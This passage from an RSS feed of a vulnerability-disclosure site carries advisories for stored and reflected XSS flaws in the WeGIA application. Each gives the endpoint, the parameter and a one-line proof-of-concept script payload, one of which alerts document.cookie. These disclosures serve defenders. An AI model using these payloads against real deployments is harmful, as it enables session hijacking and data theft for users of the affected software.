    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/rafael50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/rafael-corvino/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Rafael Corvino&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;*By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/Sec-Dojo-Cyber-House/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;*code&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Mon, 13 Jan 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-23035</title>
        <link>https://www.cvehunters.com/p/cve-2025-23035/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-23035/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-23035-cross-site-scripting-xss-stored-endpoint-adicionar_tipo_quadro_horariophp-parameter-tipo&amp;#34;&amp;gt;CVE-2025-23035: Cross-Site Scripting (XSS) Stored endpoint &amp;lt;code&amp;gt;adicionar_tipo_quadro_horario.php&amp;lt;/code&amp;gt; parameter &amp;lt;code&amp;gt;tipo&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-23035&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-23035&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Stored Cross-Site Scripting (XSS) vulnerability was identified in the &amp;lt;code&amp;gt;adicionar_tipo_quadro_horario.php&amp;lt;/code&amp;gt; endpoint of the WeGIA application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;tipo&amp;lt;/code&amp;gt; parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/LabRedesCefetRJ/WeGIA/security&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/LabRedesCefetRJ/WeGIA/security&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;POST /html/quadro_horario/adicionar_tipo_quadro_horario.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-23035-cross-site-scripting-xss-stored-endpoint-adicionar_tipo_quadro_horariophp-parameter-tipo&amp;#34;&amp;gt;CVE-2025-23035: Cross-Site Scripting (XSS) Stored endpoint &amp;lt;code&amp;gt;adicionar_tipo_quadro_horario.php&amp;lt;/code&amp;gt; parameter &amp;lt;code&amp;gt;tipo&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-23035&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-23035&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Stored Cross-Site Scripting (XSS) vulnerability was identified in the &amp;lt;code&amp;gt;adicionar_tipo_quadro_horario.php&amp;lt;/code&amp;gt; endpoint of the WeGIA application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;tipo&amp;lt;/code&amp;gt; parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/LabRedesCefetRJ/WeGIA/security&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/LabRedesCefetRJ/WeGIA/security&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;POST /html/quadro_horario/adicionar_tipo_quadro_horario.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parameter: &amp;lt;code&amp;gt;tipo&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The application fails to properly validate and sanitize user inputs in the &amp;lt;code&amp;gt;adicionar_tipo_quadro_horario.php&amp;lt;/code&amp;gt; parameter. This lack of validation allows attackers to inject malicious scripts, which are then stored on the server. Whenever the affected page is accessed, the malicious payload is executed in the victim&amp;#39;s browser, potentially compromising the user&amp;#39;s data and system.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;POC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-javascript&amp;#34; data-lang=&amp;#34;javascript&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;script&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;top&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;[&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mf&amp;#34;&amp;gt;8680439.&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;.&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;toString&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;30&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;)](&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;1337&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;)&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;/script&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-23035/402371640-1d88d334-67da-4a9b-9ca0-31c2b92b6dfb.png&amp;#34;
	width=&amp;#34;806&amp;#34;
	height=&amp;#34;225&amp;#34;
	srcset=&amp;#34;/p/cve-2025-23035/402371640-1d88d334-67da-4a9b-9ca0-31c2b92b6dfb_hu_96dcde3cebe73f11.png 480w, /p/cve-2025-23035/402371640-1d88d334-67da-4a9b-9ca0-31c2b92b6dfb_hu_44063c080014bc74.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;358&amp;#34;
		data-flex-basis=&amp;#34;859px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Stealing session cookies: Attackers can use stolen session cookies to hijack a user&amp;#39;s session and perform actions on their behalf.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Downloading malware: Attackers can trick users into downloading and installing malware on their computers.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Hijacking browsers: Attackers can hijack a user&amp;#39;s browser or deliver browser-based exploits.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Stealing credentials: Attackers can steal a user&amp;#39;s credentials.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Obtaining sensitive information: Attackers can obtain sensitive information stored in a user&amp;#39;s account or in their browser.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Defacing websites: Attackers can deface a website by altering its content.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Damaging a business&amp;#39;s reputation: Attackers can damage a business&amp;#39;s image or spread misinformation by defacing a corporate website.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-qfmh-qrr2-5c4g&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-qfmh-qrr2-5c4g&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/elisangelasilvademendonca/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/elisangela50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/elisangelasilvademendonca/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Elisangela Mendonça&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/Sec-Dojo-Cyber-House/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Mon, 13 Jan 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-23036</title>
        <link>https://www.cvehunters.com/p/cve-2025-23036/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-23036/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-23036-cross-site-scripting-xss-reflected-endpoint-pre_cadastro_funcionariophp-parameter-msg_e&amp;#34;&amp;gt;CVE-2025-23036: Cross-Site Scripting (XSS) Reflected endpoint &amp;lt;code&amp;gt;pre_cadastro_funcionario.php&amp;lt;/code&amp;gt; parameter &amp;lt;code&amp;gt;msg_e&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-230336&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-230336&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Reflected Cross-Site Scripting (XSS) vulnerability was identified in the &amp;lt;code&amp;gt;pre_cadastro_funcionario.php&amp;lt;/code&amp;gt; endpoint of the WeGIA application. This vulnerability allows attackers to inject malicious scripts in the &amp;lt;code&amp;gt;msg_e&amp;lt;/code&amp;gt; parameter.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;GET /html/funcionario/pre_cadastro_funcionario.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parameter: &amp;lt;code&amp;gt;msg_e&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The application fails to validate and sanitize user inputs in the &amp;lt;code&amp;gt;msg_e&amp;lt;/code&amp;gt; parameter. This lack of validation permits the injection of malicious payloads, which are reflected back to the user&amp;#39;s browser in the server&amp;#39;s response and executed within the context of the victim&amp;#39;s browser.&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-23036-cross-site-scripting-xss-reflected-endpoint-pre_cadastro_funcionariophp-parameter-msg_e&amp;#34;&amp;gt;CVE-2025-23036: Cross-Site Scripting (XSS) Reflected endpoint &amp;lt;code&amp;gt;pre_cadastro_funcionario.php&amp;lt;/code&amp;gt; parameter &amp;lt;code&amp;gt;msg_e&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-230336&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-230336&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Reflected Cross-Site Scripting (XSS) vulnerability was identified in the &amp;lt;code&amp;gt;pre_cadastro_funcionario.php&amp;lt;/code&amp;gt; endpoint of the WeGIA application. This vulnerability allows attackers to inject malicious scripts in the &amp;lt;code&amp;gt;msg_e&amp;lt;/code&amp;gt; parameter.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;GET /html/funcionario/pre_cadastro_funcionario.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parameter: &amp;lt;code&amp;gt;msg_e&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The application fails to validate and sanitize user inputs in the &amp;lt;code&amp;gt;msg_e&amp;lt;/code&amp;gt; parameter. This lack of validation permits the injection of malicious payloads, which are reflected back to the user&amp;#39;s browser in the server&amp;#39;s response and executed within the context of the victim&amp;#39;s browser.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;POC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-javascript&amp;#34; data-lang=&amp;#34;javascript&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;&amp;amp;#34;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;script&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;alert&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nb&amp;#34;&amp;gt;document&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;.&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;cookie&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;)&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;/script&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-23036/402374072-65222dc8-7ff7-4a1f-973c-023270034023.png&amp;#34;
	width=&amp;#34;799&amp;#34;
	height=&amp;#34;229&amp;#34;
	srcset=&amp;#34;/p/cve-2025-23036/402374072-65222dc8-7ff7-4a1f-973c-023270034023_hu_615255467e8a70fc.png 480w, /p/cve-2025-23036/402374072-65222dc8-7ff7-4a1f-973c-023270034023_hu_605df0bed62e324e.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;348&amp;#34;
		data-flex-basis=&amp;#34;837px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt; Reflected cross-site scripting (XSS) attacks can have serious consequences, including:
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;User actions: Attackers can perform any action the user can, such as viewing, modifying, or initiating interactions with other users.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Data theft: Attackers can exfiltrate data or install malware on the user&amp;#39;s machine.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Account compromise: Attackers can manipulate or steal cookies, or compromise confidential information.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Malicious code: Attackers can execute malicious code on the user&amp;#39;s system.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Business reputation damage: Attackers can deface a corporate website or spread misinformation.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Misdirection: Attackers can change the instructions given to users, which can be dangerous if the target is a government website or provides vital resources.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-2vpg-j5jh-j22x&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-2vpg-j5jh-j22x&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/elisangelasilvademendonca/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/elisangela50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/elisangelasilvademendonca/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Elisangela Mendonça&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;contributors&amp;#34;&amp;gt;Contributors
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/angelo-morette-019/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/angelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/angelo-morette-019/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Angelo Morette&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/diegocbcastro/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/diego50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/diegocbcastro/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Diego Castro&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/natan50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Natan Maia Morette&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/rafael-corvino/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/rafael50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/rafael-corvino/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Rafael Corvino&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/Sec-Dojo-Cyber-House/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Mon, 13 Jan 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-23037</title>
        <link>https://www.cvehunters.com/p/cve-2025-23037/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-23037/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-23037-cross-site-scripting-xss-stored-endpoint-controlphp-parameter-cargo&amp;#34;&amp;gt;CVE-2025-23037: Cross-Site Scripting (XSS) Stored endpoint &amp;lt;code&amp;gt;control.php&amp;lt;/code&amp;gt; parameter &amp;lt;code&amp;gt;cargo&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-230337&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-230337&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
